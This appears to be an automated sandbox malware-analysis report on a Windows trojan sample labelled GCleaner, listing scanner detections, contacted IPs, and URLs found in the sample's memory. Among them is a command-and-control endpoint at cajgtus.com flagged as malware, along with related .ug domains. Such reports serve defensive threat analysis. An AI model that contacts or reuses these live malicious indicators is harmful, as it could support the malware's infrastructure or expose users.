          66d5df681876c_file010924.exe71%ReversingLabsWin32.Trojan.GCleaner
          66d5df681876c_file010924.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe71%ReversingLabsWin32.Trojan.GCleaner
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://www.avito.ru/0%URL Reputationsafe
          https://www.ctrip.com/0%URL Reputationsafe
          https://www.leboncoin.fr/0%URL Reputationsafe
          https://www.reddit.com/0%URL Reputationsafe
          http://www.reddit.com/0%URL Reputationsafe
          https://openjsf.org/0%URL Reputationsafe
          https://www.amazon.ca/0%URL Reputationsafe
          https://www.ebay.co.uk/0%URL Reputationsafe
          https://www.ebay.de/0%URL Reputationsafe
          https://mail.google.com/mail/?usp=installed_webapp0%Avira URL Cloudsafe
          https://www.youtube.com/:0%Avira URL Cloudsafe
          https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs0%Avira URL Cloudsafe
          https://docs.google.com/document/J0%Avira URL Cloudsafe
          https://docs.google.com/document/:0%Avira URL Cloudsafe
          https://assets.activity.windows.com/v1/assets0%Avira URL Cloudsafe
          https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c44290%Avira URL Cloudsafe
          https://mail.google.com/mail/:0%Avira URL Cloudsafe
          https://substrate.office365.us/api/v2.0/Users(0%Avira URL Cloudsafe
          https://allegro.pl/0%URL Reputationsafe
          https://substrate.office365.us/imageB2/v1.0/users/0%Avira URL Cloudsafe
          http://underscorejs.org/LICENSE0%URL Reputationsafe
          https://bugzilla.mo0%URL Reputationsafe
          https://outlook.office.com/M365.Access0%Avira URL Cloudsafe
          https://wetransfer.com/downloads(0%Avira URL Cloudsafe
          https://drive.google.com/?lfhs=20%Avira URL Cloudsafe
          http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200100%Avira URL Cloudmalware
          https://api.2ip.ua/q0%Avira URL Cloudsafe
          https://substrate.office.com/api/v2.0/Users(0%Avira URL Cloudsafe
          https://www.youtube.com/s/notifications/manifest/cr_install.html0%Avira URL Cloudsafe
          https://mail.google.com/mail/J0%Avira URL Cloudsafe
          https://www.youtube.com/?feature=ytca0%Avira URL Cloudsafe
          https://www.youtube.com/J0%Avira URL Cloudsafe
          http://www.openssl.org/support/faq.html0%URL Reputationsafe
          https://www.ifeng.com/0%URL Reputationsafe
          http://jedwatson.github.io/classnames0%URL Reputationsafe
          https://www.amazon.com/0%Avira URL Cloudsafe
          http://www.nytimes.com/0%URL Reputationsafe
          https://api.2ip.ua/geo.jsonQ0%Avira URL Cloudsafe
          https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonj0%Avira URL Cloudsafe
          http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200GtY100%Avira URL Cloudmalware
          https://api.2ip.ua/geo.jsoni0%Avira URL Cloudsafe
          https://lodash.com/0%URL Reputationsafe
          https://www.bbc.co.uk/0%Avira URL Cloudsafe
          https://api.2ip.ua/;0%Avira URL Cloudsafe
          https://reactjs.org/docs/error-decoder.html?invariant=0%URL Reputationsafe
          https://clients3.google.com/generate_2040%Avira URL Cloudsafe
          https://www.youtube.com/0%Avira URL Cloudsafe
          https://www.wykop.pl/0%URL Reputationsafe
          https://www.olx.pl/0%URL Reputationsafe
          https://www.amazon.fr/0%URL Reputationsafe
          https://lodash.com/license0%URL Reputationsafe
          https://fb.me/react-polyfills0%URL Reputationsafe
          https://api.2ip.ua/geo.jsonHB0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonI8=d80%Avira URL Cloudsafe
          http://www.youtube.com/0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonPC0%Avira URL Cloudsafe
          https://www.google.com/0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonWi0%Avira URL Cloudsafe
          https://api.2ip.ua/90%Avira URL Cloudsafe
          https://www.iqiyi.com/0%Avira URL Cloudsafe
          https://github.com/react-native-community/react-native-netinfo0%Avira URL Cloudsafe
          https://wetransfer.com/downloads/abe121434ad837dd5bdd0380%Avira URL Cloudsafe
          https://mail.google.com/mail/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
          https://wetransfer.c0%Avira URL Cloudsafe
          https://drive.google.com/drive/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
          https://docs.google.com/presentation/J0%Avira URL Cloudsafe
          https://outlook.office.com/0%Avira URL Cloudsafe
          https://docs.google.com/document/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
          http://www.amazon.com/0%Avira URL Cloudsafe
          https://mths.be/fromcodepoint0%Avira URL Cloudsafe
          http://www.twitter.com/0%Avira URL Cloudsafe
          https://docs.google.com/presentation/:0%Avira URL Cloudsafe
          https://docs.google.com/presentation/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
          https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs0%Avira URL Cloudsafe
          https://github.com/jsstyles/css-vendor0%Avira URL Cloudsafe
          https://docs.google.com/spreadsheets/J0%Avira URL Cloudsafe
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
          https://docs.google.com/spreadsheets/?usp=installed_webapp0%Avira URL Cloudsafe
          https://github.com/focus-trap/tabbable/blob/master/LICENSE0%Avira URL Cloudsafe
          https://outlook.office.com/User.ReadWrite0%Avira URL Cloudsafe
          https://substrate.office.com/imageB2/v1.0/users/0%Avira URL Cloudsafe
          http://cajgtus.com/test1/get.phpj100%Avira URL Cloudmalware
          https://api.2ip.ua/geo.jsonv0%Avira URL Cloudsafe
          https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonp0%Avira URL Cloudsafe
          https://docs.google.com/spreadsheets/:0%Avira URL Cloudsafe
          https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d0%Avira URL Cloudsafe
          https://wetransfer.com/downloads0%Avira URL Cloudsafe
          https://drive.google.com/:0%Avira URL Cloudsafe
          http://cajgtus.com/test1/get.php100%Avira URL Cloudmalware
          https://api.2ip.ua/0%Avira URL Cloudsafe
          https://www.amazon.co.uk/0%Avira URL Cloudsafe
          https://twitter.com/0%Avira URL Cloudsafe
          https://drive.google.com/J0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.json0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonRx0%Avira URL Cloudsafe
          https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
          https://www.google.com/complete/0%Avira URL Cloudsafe
          https://docs.google.com/presentation/?usp=installed_webapp0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          cajgtus.com
          190.220.21.28
          truetrue
            unknown
            api.2ip.ua
            188.114.97.3
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://cajgtus.com/test1/get.phptrue
              • Avira URL Cloud: malware
              unknown
              https://api.2ip.ua/geo.jsonfalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://mail.google.com/mail/?usp=installed_webapp66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.avito.ru/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://assets.activity.windows.com/v1/assets66d5df681876c_file010924.exe, 00000007.00000003.1369978087.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1353189092.0000000003440000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://substrate.office365.us/api/v2.0/Users(66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/document/J66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.ctrip.com/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.youtube.com/:66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c442966d5df681876c_file010924.exe, 00000007.00000003.1357385958.0000000003440000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs66d5df681876c_file010924.exe, 00000007.00000003.1850244069.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://mail.google.com/mail/:66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.leboncoin.fr/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://substrate.office365.us/imageB2/v1.0/users/66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/document/:66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://outlook.office.com/M365.Access66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wetransfer.com/downloads(66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000716000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF20066d5df681876c_file010924.exe, 0000000C.00000002.2491283799.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000638000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://mail.google.com/mail/J66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://substrate.office.com/api/v2.0/Users(66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.com/?lfhs=266d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.reddit.com/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.youtube.com/s/notifications/manifest/cr_install.html66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/q66d5df681876c_file010924.exe, 00000007.00000003.1273669336.000000000061C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.reddit.com/66d5df681876c_file010924.exe, 0000000C.00000003.1345160231.0000000003570000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://openjsf.org/66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.amazon.ca/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.youtube.com/?feature=ytca66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.youtube.com/J66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.ebay.co.uk/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.ebay.de/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.2ip.ua/geo.jsonQ66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000679000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.amazon.com/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200GtY66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.00000000006C3000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://api.2ip.ua/geo.jsoni66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs66d5df681876c_file010924.exe, 00000007.00000003.1850244069.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonj66d5df681876c_file010924.exe, 00000002.00000003.1251308792.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000003.1251353345.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://clients3.google.com/generate_20466d5df681876c_file010924.exe, 00000007.00000003.1357773774.0000000003440000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.youtube.com/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://allegro.pl/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://underscorejs.org/LICENSE66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.2ip.ua/;66d5df681876c_file010924.exe, 00000002.00000002.1252430363.000000000062D000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000003.1251377452.000000000062D000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000003.1250134757.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.bbc.co.uk/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://bugzilla.mo66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.0000000000545000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.2ip.ua/geo.jsonHB66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonI8=d866d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000796000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.youtube.com/66d5df681876c_file010924.exe, 00000007.00000003.1345267437.0000000003440000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonPC66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonWi66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.google.com/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.0000000000545000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.iqiyi.com/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/966d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000679000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/react-native-community/react-native-netinfo66d5df681876c_file010924.exe, 00000007.00000003.1357773774.0000000003440000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wetransfer.com/downloads/abe121434ad837dd5bdd03866d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000716000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://mail.google.com/mail/installwebapp?usp=chrome_default66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wetransfer.c66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000716000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/presentation/J66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.com/drive/installwebapp?usp=chrome_default66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.amazon.com/66d5df681876c_file010924.exe, 0000000C.00000003.1344918775.0000000003570000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://mths.be/fromcodepoint66d5df681876c_file010924.exe, 00000007.00000003.1850189989.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/document/installwebapp?usp=chrome_default66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.twitter.com/66d5df681876c_file010924.exe, 00000007.00000003.1345195304.0000000003440000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://outlook.office.com/66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/presentation/:66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/presentation/installwebapp?usp=chrome_default66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs66d5df681876c_file010924.exe, 00000007.00000003.1850244069.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/jsstyles/css-vendor66d5df681876c_file010924.exe, 00000007.00000003.1847667825.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.openssl.org/support/faq.html66d5df681876c_file010924.exe, 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://docs.google.com/spreadsheets/J66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error66d5df681876c_file010924.exe, 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/spreadsheets/?usp=installed_webapp66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/focus-trap/tabbable/blob/master/LICENSE66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://outlook.office.com/User.ReadWrite66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://substrate.office.com/imageB2/v1.0/users/66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.ifeng.com/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://cajgtus.com/test1/get.phpj66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000679000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://api.2ip.ua/geo.jsonv66d5df681876c_file010924.exe, 00000007.00000003.1273669336.0000000000656000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs66d5df681876c_file010924.exe, 00000007.00000003.1850244069.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonp66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/spreadsheets/:66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://jedwatson.github.io/classnames66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.00000000006C3000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://wetransfer.com/downloads66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000716000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://www.nytimes.com/66d5df681876c_file010924.exe, 00000007.00000003.1345122319.0000000003440000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://drive.google.com/:66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000748000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.amazon.co.uk/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://lodash.com/66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://reactjs.org/docs/error-decoder.html?invariant=66d5df681876c_file010924.exe, 00000007.00000003.1849676514.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://drive.google.com/J66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.wykop.pl/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://twitter.com/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.olx.pl/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.2ip.ua/geo.jsonRx66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000638000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.amazon.fr/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.google.com/complete/66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://lodash.com/license66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://docs.google.com/presentation/?usp=installed_webapp66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://fb.me/react-polyfills66d5df681876c_file010924.exe, 00000007.00000003.1849676514.0000000003300000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              188.114.97.3
              api.2ip.uaEuropean Union
              13335CLOUDFLARENETUSfalse
              190.220.21.28
              cajgtus.comArgentina
              19037AMXArgentinaSAARtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1503035
              Start date and time:2024-09-02 18:20:10 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 47s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:35
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:66d5df681876c_file010924.exe
              Detection:MAL
